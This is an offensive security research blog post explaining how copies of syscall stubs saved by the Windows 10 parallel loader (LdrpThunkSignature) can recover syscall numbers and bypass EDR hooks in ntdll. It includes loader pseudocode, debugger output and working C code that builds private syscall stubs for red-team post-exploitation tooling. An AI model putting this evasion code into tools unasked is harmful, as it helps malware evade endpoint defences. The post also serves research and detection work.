Post-exploitation tooling designed to operate within mature environments is frequently required to slip past endpoint detection and response (EDR) software running on the target. EDR products frequently operate by hooking Windows API functions, especially those exported by ntdll (specifically the Nt*/Zw*() syscall-based API functions). Since all interaction with the underlying operating system passes through these functions under normal circumstances, they provide an ideal point of interception for detecting unwanted application behaviour.
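To make the interception point concrete: on x64 Windows 10 an unmodified Nt* stub begins with mov r10, rcx followed by mov eax, <syscall number> (bytes 4c 8b d1 b8), as the debugger output later in this post shows. A user-mode hook typically overwrites these opening bytes with a jump into the EDR's own code. The following is a minimal, portable sketch of checking a stub's first bytes for that prologue. The name stub_prologue_intact is hypothetical, and the caller is assumed to pass a pointer to at least four readable bytes.

```c
#include <stdbool.h>
#include <stdint.h>
#include <string.h>

/* First four bytes of an unmodified x64 syscall stub:
 *   4c 8b d1   mov r10, rcx
 *   b8 ..      mov eax, imm32 (the syscall number follows) */
static const uint8_t kSyscallPrologue[4] = { 0x4c, 0x8b, 0xd1, 0xb8 };

/* Hypothetical helper: returns true when the stub still starts with the
 * expected prologue, false when something (for example an inline hook)
 * has replaced it. */
bool stub_prologue_intact(const uint8_t *stub)
{
    return memcmp(stub, kSyscallPrologue, sizeof(kSyscallPrologue)) == 0;
}
```

A check like this only notices modifications to the first four bytes; a hook placed deeper in the stub would need a longer comparison.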
MDSec have previously discussed various methods of circumventing these hooks in our post Bypassing User-Mode Hooks and Direct Invocation of System Calls for Red Teams [1]. However, since EDR vendors frequently play a game of catch-up with researchers, the most innovative products can and have developed ways to detect several (if not all) of the techniques described. There is therefore some value in identifying novel techniques for achieving hook circumvention.
During the development of the Nighthawk C2 [2], MDSec stumbled upon what appears to be a novel technique for identifying the syscall numbers of certain syscalls, which may then be used to load a new copy of ntdll into memory, allowing the remaining syscall numbers to be read without triggering any installed function hooks. The technique involves abusing copies of certain syscall stubs made early during process initialisation by the new Windows 10 parallel loader.
Beginning with Windows 10, Microsoft introduced the concept of parallel DLL loading. Parallel loading allows a process to recursively map the DLLs imported via module import tables in parallel, rather than synchronously on a single thread, leading to performance gains during initial application launch.
We first noticed the existence of the parallel loader when attempting to understand why – in a simple single threaded application – there were three or four additional threads created. Examining these threads confirmed that these were thread pool workers. Rather than attempt to reverse engineer the work queued to these threads we took to Google in the hope that someone else had already asked (and hopefully answered) the same question.
Google returned only a few results, but amongst them were a blog post by Jeffery Tang at BlackBerry from 2017 [3] and an excellent StackOverflow answer to essentially the same question I was asking, from user RbMm [4], who had also done an excellent job of providing pseudocode to help illuminate the steps involved in the process. Between them these articles made clear what was going on under the hood, and I recommend them both to anyone interested in the inner workings of the parallel loader itself.
One thing which caught my eye immediately when reading the StackOverflow answer was the fact that the parallel loader short-circuits the parallel DLL load and falls back to synchronous mode if several core low-level native APIs are found to be detoured. These APIs are involved in opening and mapping images from disk.
The relevant section from the StackOverflow answer is quoted verbatim below and of course remains the work of user RbMm:
LdrpInitializeProcess() calls void LdrpDetectDetour(). This name speaks for itself. it does not return a value but initializes the global variable BOOLEAN LdrpDetourExist. This routine first checks whether some loader critical routines are hooked - currently these are 5 routines:
NtOpenFile
NtCreateSection
NtQueryAttributesFile
NtOpenSection
NtMapViewOfSection
If yes - LdrpDetourExist = TRUE;
If not hooked - ThreadDynamicCodePolicyInfo is queried - full code:
void LdrpDetectDetour()
{
    if (LdrpDetourExist) return ;
    static PVOID LdrpCriticalLoaderFunctions[] = {
        NtOpenFile,
        NtCreateSection,
        ZwQueryAttributesFile,
        ZwOpenSection,
        ZwMapViewOfSection,
    };
    static M128A LdrpThunkSignature[5] = {
        //***
    };
    ULONG n = RTL_NUMBER_OF(LdrpCriticalLoaderFunctions);
    M128A* ppv = (M128A*)LdrpCriticalLoaderFunctions;
    M128A* pps = LdrpThunkSignature;
    do
    {
        if (ppv->Low != pps->Low || ppv->High != pps->High)
        {
            if (LdrpDebugFlags & 5)
            {
                DbgPrint("!!! Detour detected, disable parallel loading\n");
                LdrpDetourExist = TRUE;
                return;
            }
        }
    } while (pps++, ppv++, --n);
    BOOL DynamicCodePolicy;
    if (0 <= ZwQueryInformationThread(NtCurrentThread(), ThreadDynamicCodePolicyInfo, &DynamicCodePolicy, sizeof(DynamicCodePolicy), 0))
    {
        if (LdrpDetourExist = (DynamicCodePolicy == 1))
        {
            if (LdrpMapAndSnapWork)
            {
                WaitForThreadpoolWorkCallbacks(LdrpMapAndSnapWork, TRUE);//TpWaitForWork
                TpReleaseWork(LdrpMapAndSnapWork);//CloseThreadpoolWork
                LdrpMapAndSnapWork = 0;
                TpReleasePool(LdrpThreadPool);//CloseThreadpool
                LdrpThreadPool = 0;
            }
        }
    }
}
The above pseudocode for function LdrpDetectDetour() is essentially examining the first 16 bytes of code for five native API functions, NtOpenFile(), NtCreateSection(), ZwQueryAttributesFile(), ZwOpenSection() and ZwMapViewOfSection(), and determining whether these bytes have been modified from the known good bytes stored within the LdrpThunkSignature array within ntdll.
(A quick disassembly of the LdrpDetectDetour() function confirms that the behaviour described in the pseudocode above remains. It should be mentioned, however, that the function now additionally verifies the integrity of a further 27 native APIs, but still only compares exact syscall stubs for the five functions detailed.)
Examination of ntdll with IDA Pro revealed that the LdrpDetectDetour() function is called from two places: LdrpLoadDllInternal() (called directly from LdrpLoadDll()) and LdrpEnableParallelLoading() (called late in LdrpInitializeProcess()). Since LdrpDetectDetour() configures a global variable which can halt the parallel load and force further loads to occur synchronously, and many DLLs which install detours (such as EDR user-space components) do so immediately upon being loaded into a process, it makes sense for the detour detection function to be called repeatedly upon loading each new DLL dependency.
Investigation of this process invites a question, however: where do the known good stubs for the five native API functions come from? Initial expectations were that the syscall stubs would be hardcoded at compile time during code generation. However, examining the LdrpThunkSignature array statically indicates that this is not the case, since the array is not initialised until ntdll is mapped (the array resides in the uninitialised .data section).
Taking a data cross-reference of LdrpThunkSignature identifies one other use of the array, within LdrpCaptureCriticalThunks(). This function in turn is called early by LdrpInitializeProcess(), before any import dependencies have been loaded (and hence before third-party modules which may install detours have been loaded into the process).
Quickly hand decompiling LdrpCaptureCriticalThunks() reveals an implementation similar to the following pseudocode:
VOID LdrpCaptureCriticalThunks()
{
    const DWORD c_dwNumCriticalLoaderFunctions = 5;
    MEMORY_WORKING_SET_EX_INFORMATION rgMemWorkingSetInfo[5];
    NTSTATUS ntStatus;
    // Request working-set attributes for the page containing each critical function
    for (DWORD i = 0; i < c_dwNumCriticalLoaderFunctions; i++)
    {
        rgMemWorkingSetInfo[i].VirtualAddress = LdrpCriticalLoaderFunctions[i];
    }
    ntStatus = ZwQueryVirtualMemory(NtCurrentProcess(), NULL, MemoryWorkingSetExInformation, rgMemWorkingSetInfo, sizeof(rgMemWorkingSetInfo), 0);
    if (NT_SUCCESS(ntStatus))
    {
        for (DWORD i = 0; i < c_dwNumCriticalLoaderFunctions; i++)
        {
            if (!rgMemWorkingSetInfo[i].VirtualAttributes.Bad)
            {
                goto ExitError;
            }
            // Save the first 16 bytes of the stub as its known good signature
            LdrpThunkSignature[i] = *(__m128 *)LdrpCriticalLoaderFunctions[i];
        }
        return;
    }
ExitError:
    // Any failure is recorded as if a detour exists
    LdrpDetourExist = TRUE;
}
From the above it can be clearly seen that the first 16 bytes of each syscall stub for the five critical functions are copied into the LdrpThunkSignature array by LdrpCaptureCriticalThunks().
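The capture-then-compare relationship between LdrpCaptureCriticalThunks() and LdrpDetectDetour() can be sketched in portable C as follows. This is a simplified illustration rather than ntdll's implementation: the names capture_thunks, detour_exists and THUNK_SIGNATURE_SIZE are hypothetical, plain byte buffers stand in for the real function stubs, and the working-set query, debug-flag gate and ThreadDynamicCodePolicyInfo check are omitted.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define THUNK_SIGNATURE_SIZE 16 /* bytes saved per function */

/* Early in process start-up: save the first 16 bytes of each function
 * as its known good signature. */
void capture_thunks(const uint8_t *const funcs[],
                    uint8_t sigs[][THUNK_SIGNATURE_SIZE], size_t count)
{
    for (size_t i = 0; i < count; i++)
        memcpy(sigs[i], funcs[i], THUNK_SIGNATURE_SIZE);
}

/* Later, on each check: report a detour if any function's first 16 bytes
 * no longer match the saved signature. */
bool detour_exists(const uint8_t *const funcs[],
                   uint8_t sigs[][THUNK_SIGNATURE_SIZE], size_t count)
{
    for (size_t i = 0; i < count; i++)
        if (memcmp(sigs[i], funcs[i], THUNK_SIGNATURE_SIZE) != 0)
            return true;
    return false;
}
```

The point relevant to this post is that the saved copies remain untouched even after the live stubs are patched, so they continue to hold the original syscall numbers.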
A reader experienced with post-exploitation tool development will no doubt at this stage see where this blog post is headed: with knowledge of the syscall numbers for these five critical functions (read directly from LdrpThunkSignature), we have sufficient native API functions to be able to read a fresh copy of ntdll from disk using syscalls.
Since the LdrpThunkSignature array is not exported by ntdll, we need to locate it in the ntdll .data section. The array can be identified by the presence of the common syscall prologue:
0:001> u ntdll!LdrpThunkSignature
ntdll!LdrpThunkSignature:
00007ff9`2e1860d0 4c8bd1 mov r10,rcx
00007ff9`2e1860d3 b833000000 mov eax,33h
00007ff9`2e1860d8 f604250803fe7f01 test byte ptr [SharedUserData+0x308 (00000000`7ffe0308)],1
00007ff9`2e1860e0 4c8bd1 mov r10,rcx
00007ff9`2e1860e3 b84a000000 mov eax,4Ah
00007ff9`2e1860e8 f604250803fe7f01 test byte ptr [SharedUserData+0x308 (00000000`7ffe0308)],1
00007ff9`2e1860f0 4c8bd1 mov r10,rcx
00007ff9`2e1860f3 b83d000000 mov eax,3Dh
0:001> db ntdll!LdrpThunkSignature
00007ff9`2e1860d0 4c 8b d1 b8 33 00 00 00-f6 04 25 08 03 fe 7f 01 L...3.....%.....
00007ff9`2e1860e0 4c 8b d1 b8 4a 00 00 00-f6 04 25 08 03 fe 7f 01 L...J.....%.....
00007ff9`2e1860f0 4c 8b d1 b8 3d 00 00 00-f6 04 25 08 03 fe 7f 01 L...=.....%.....
00007ff9`2e186100 4c 8b d1 b8 37 00 00 00-f6 04 25 08 03 fe 7f 01 L...7.....%.....
00007ff9`2e186110 4c 8b d1 b8 28 00 00 00-f6 04 25 08 03 fe 7f 01 L...(.....%.....
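Reading the dump above, each 16-byte entry starts with 4c 8b d1 (mov r10, rcx) and b8 (mov eax, imm32), so the syscall number is the little-endian 32-bit value at offset 4. A minimal sketch of decoding a single entry follows; the function name syscall_number_from_signature is hypothetical.

```c
#include <stdint.h>
#include <string.h>

/* Decode the syscall number from one 16-byte LdrpThunkSignature entry.
 * Returns -1 if the entry does not start with the expected prologue. */
int32_t syscall_number_from_signature(const uint8_t entry[16])
{
    static const uint8_t prologue[4] = { 0x4c, 0x8b, 0xd1, 0xb8 };

    if (memcmp(entry, prologue, sizeof(prologue)) != 0)
        return -1;

    /* imm32 operand of mov eax, imm32: little-endian, at offset 4 */
    uint32_t number = (uint32_t)entry[4]
                    | ((uint32_t)entry[5] << 8)
                    | ((uint32_t)entry[6] << 16)
                    | ((uint32_t)entry[7] << 24);
    return (int32_t)number;
}
```

Applied to the five rows of the dump, this yields 0x33, 0x4a, 0x3d, 0x37 and 0x28, in the same order as the LdrpCriticalLoaderFunctions array. These values are specific to the build shown; syscall numbers differ between Windows versions, which is why they are read at runtime rather than hardcoded.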
Code which is able to use this information to recover the required syscalls follows (an extract from the implementation provided by MDSec to recover all syscalls):
BOOL InitSyscallsFromLdrpThunkSignature()
{
    // Walk the PEB loader list to find the module entry for ntdll
    PPEB Peb = (PPEB)__readgsqword(0x60);
    PPEB_LDR_DATA Ldr = Peb->Ldr;
    PLDR_DATA_TABLE_ENTRY NtdllLdrEntry = NULL;
    for (PLDR_DATA_TABLE_ENTRY LdrEntry = (PLDR_DATA_TABLE_ENTRY)Ldr->InLoadOrderModuleList.Flink;
        LdrEntry->DllBase != NULL;
        LdrEntry = (PLDR_DATA_TABLE_ENTRY)LdrEntry->InLoadOrderLinks.Flink)
    {
        if (_wcsnicmp(LdrEntry->BaseDllName.Buffer, L"ntdll.dll", 9) == 0)
        {
            // got ntdll
            NtdllLdrEntry = LdrEntry;
            break;
        }
    }
    if (NtdllLdrEntry == NULL)
    {
        return FALSE;
    }
    // Locate the .data section, which holds the unexported LdrpThunkSignature array
    PIMAGE_NT_HEADERS ImageNtHeaders = (PIMAGE_NT_HEADERS)((ULONG_PTR)NtdllLdrEntry->DllBase + ((PIMAGE_DOS_HEADER)NtdllLdrEntry->DllBase)->e_lfanew);
    PIMAGE_SECTION_HEADER SectionHeader = (PIMAGE_SECTION_HEADER)((ULONG_PTR)&ImageNtHeaders->OptionalHeader + ImageNtHeaders->FileHeader.SizeOfOptionalHeader);
    ULONG_PTR DataSectionAddress = 0;
    DWORD DataSectionSize = 0;
    for (WORD i = 0; i < ImageNtHeaders->FileHeader.NumberOfSections; i++)
    {
        if (!strcmp((char*)SectionHeader[i].Name, ".data"))
        {
            DataSectionAddress = (ULONG_PTR)NtdllLdrEntry->DllBase + SectionHeader[i].VirtualAddress;
            DataSectionSize = SectionHeader[i].Misc.VirtualSize;
            break;
        }
    }
    DWORD dwSyscallNo_NtOpenFile = 0, dwSyscallNo_NtCreateSection = 0, dwSyscallNo_NtMapViewOfSection = 0;
    if (!DataSectionAddress || DataSectionSize < 16 * 5)
    {
        return FALSE;
    }
    // Scan for five consecutive 16-byte entries which each begin with the
    // syscall prologue 4c 8b d1 b8 (mov r10, rcx; mov eax, imm32)
    for (UINT uiOffset = 0; uiOffset < DataSectionSize - (16 * 5); uiOffset++)
    {
        if (*(DWORD*)(DataSectionAddress + uiOffset) == 0xb8d18b4c &&
            *(DWORD*)(DataSectionAddress + uiOffset + 16) == 0xb8d18b4c &&
            *(DWORD*)(DataSectionAddress + uiOffset + 32) == 0xb8d18b4c &&
            *(DWORD*)(DataSectionAddress + uiOffset + 48) == 0xb8d18b4c &&
            *(DWORD*)(DataSectionAddress + uiOffset + 64) == 0xb8d18b4c)
        {
            // The syscall number is the imm32 at offset 4 of each entry. Entries follow
            // the LdrpCriticalLoaderFunctions order: 0 = NtOpenFile, 1 = NtCreateSection,
            // 4 = NtMapViewOfSection
            dwSyscallNo_NtOpenFile = *(DWORD*)(DataSectionAddress + uiOffset + 4);
            dwSyscallNo_NtCreateSection = *(DWORD*)(DataSectionAddress + uiOffset + 16 + 4);
            dwSyscallNo_NtMapViewOfSection = *(DWORD*)(DataSectionAddress + uiOffset + 64 + 4);
            break;
        }
    }
    if (!dwSyscallNo_NtOpenFile)
    {
        return FALSE;
    }
    // Build private stubs for the three recovered syscalls (RWX memory, for PoC simplicity)
    ULONG_PTR SyscallRegion = (ULONG_PTR)VirtualAlloc(NULL, 3 * MAX_SYSCALL_STUB_SIZE, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (!SyscallRegion)
    {
        return FALSE;
    }
    NtOpenFile = (FUNC_NTOPENFILE)BuildSyscallStub(SyscallRegion, dwSyscallNo_NtOpenFile);
    NtCreateSection = (FUNC_NTCREATESECTION)BuildSyscallStub(SyscallRegion + MAX_SYSCALL_STUB_SIZE, dwSyscallNo_NtCreateSection);
    NtMapViewOfSection = (FUNC_NTMAPVIEWOFSECTION)BuildSyscallStub(SyscallRegion + (2 * MAX_SYSCALL_STUB_SIZE), dwSyscallNo_NtMapViewOfSection);
    return TRUE;
}
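The extract above relies on BuildSyscallStub() and MAX_SYSCALL_STUB_SIZE, neither of which is shown. As a rough illustration only, a helper of that kind might emit a minimal x64 stub along the following lines. The name build_syscall_stub_sketch and the constant SKETCH_STUB_SIZE are hypothetical, and the real helper in the MDSec repository may differ (for instance, genuine ntdll stubs also contain the SharedUserData test visible in the disassembly earlier, which this sketch omits).

```c
#include <stdint.h>
#include <string.h>

#define SKETCH_STUB_SIZE 11 /* 3 + 5 + 2 + 1 bytes, see template below */

/* Hypothetical stand-in for BuildSyscallStub(): writes a minimal x64
 * syscall stub for `syscall_no` into `dest`, which must have room for
 * SKETCH_STUB_SIZE bytes, and returns `dest`. Making the memory
 * executable is left to the caller. */
void *build_syscall_stub_sketch(uint8_t *dest, uint32_t syscall_no)
{
    static const uint8_t stub_template[SKETCH_STUB_SIZE] = {
        0x4c, 0x8b, 0xd1,             /* mov r10, rcx   */
        0xb8, 0x00, 0x00, 0x00, 0x00, /* mov eax, imm32 */
        0x0f, 0x05,                   /* syscall        */
        0xc3                          /* ret            */
    };

    memcpy(dest, stub_template, sizeof(stub_template));

    /* Patch the imm32 operand with the syscall number, little-endian */
    dest[4] = (uint8_t)(syscall_no & 0xff);
    dest[5] = (uint8_t)((syscall_no >> 8) & 0xff);
    dest[6] = (uint8_t)((syscall_no >> 16) & 0xff);
    dest[7] = (uint8_t)((syscall_no >> 24) & 0xff);
    return dest;
}
```

Writing the stub into a plain byte buffer keeps the sketch portable; on Windows the destination would be the region returned by VirtualAlloc() in the extract above.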
An implementation which recovers all syscalls using the above to read ntdll from disk may be found on the MDSec ActiveBreach GitHub repository.
This implementation is of course a PoC and is not optimal from an opsec perspective (for example, the syscall stubs are placed in RWX memory allocated using VirtualAlloc()).
This post was written by @peterwintrsmith.
[1] https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/
[2] https://www.mdsec.co.uk/nighthawk/
[3] https://blogs.blackberry.com/en/2017/10/windows-10-parallel-loading-breakdown
[4] https://stackoverflow.com/questions/42789199/why-there-are-three-unexpected-worker-threads-when-a-win32-console-application-s